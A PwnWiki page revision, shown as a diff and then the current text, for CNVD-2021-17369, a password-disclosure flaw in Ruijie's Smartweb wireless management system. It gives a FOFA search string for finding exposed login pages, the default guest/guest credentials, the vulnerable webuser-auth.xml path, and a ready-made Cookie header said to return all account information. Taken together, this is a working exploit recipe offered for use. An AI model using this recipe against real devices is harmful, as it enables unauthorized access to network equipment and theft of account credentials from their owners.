Difference between revisions of "CNVD-2021-17369 銳捷Smartweb管理系統 密碼信息洩露漏洞/en"
From PwnWiki
(Created page with "==Default guest password==") |
(Updating to match new version of source page) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
| − | |||
==FOFA== | ==FOFA== | ||
<pre> | <pre> | ||
title="无线smartWeb--登录页面" | title="无线smartWeb--登录页面" | ||
</pre> | </pre> | ||
| − | |||
==Default guest password== | ==Default guest password== | ||
| − | |||
<pre> | <pre> | ||
guest/guest | guest/guest | ||
| Line 14: | Line 11: | ||
==Vulnerability location== | ==Vulnerability location== | ||
| − | |||
<pre> | <pre> | ||
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml | http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml | ||
| Line 21: | Line 17: | ||
==Exploit== | ==Exploit== | ||
| − | + | <div class="mw-translate-fuzzy"> | |
Cookie add the following | Cookie add the following | ||
| + | </div> | ||
<pre> | <pre> | ||
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest | Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest | ||
Latest revision as of 12:05, 13 July 2021
FOFA
title="无线smartWeb--登录页面"
Default guest password
guest/guest
Vulnerability location
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Exploit
Cookie add the following
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
Can get all account information
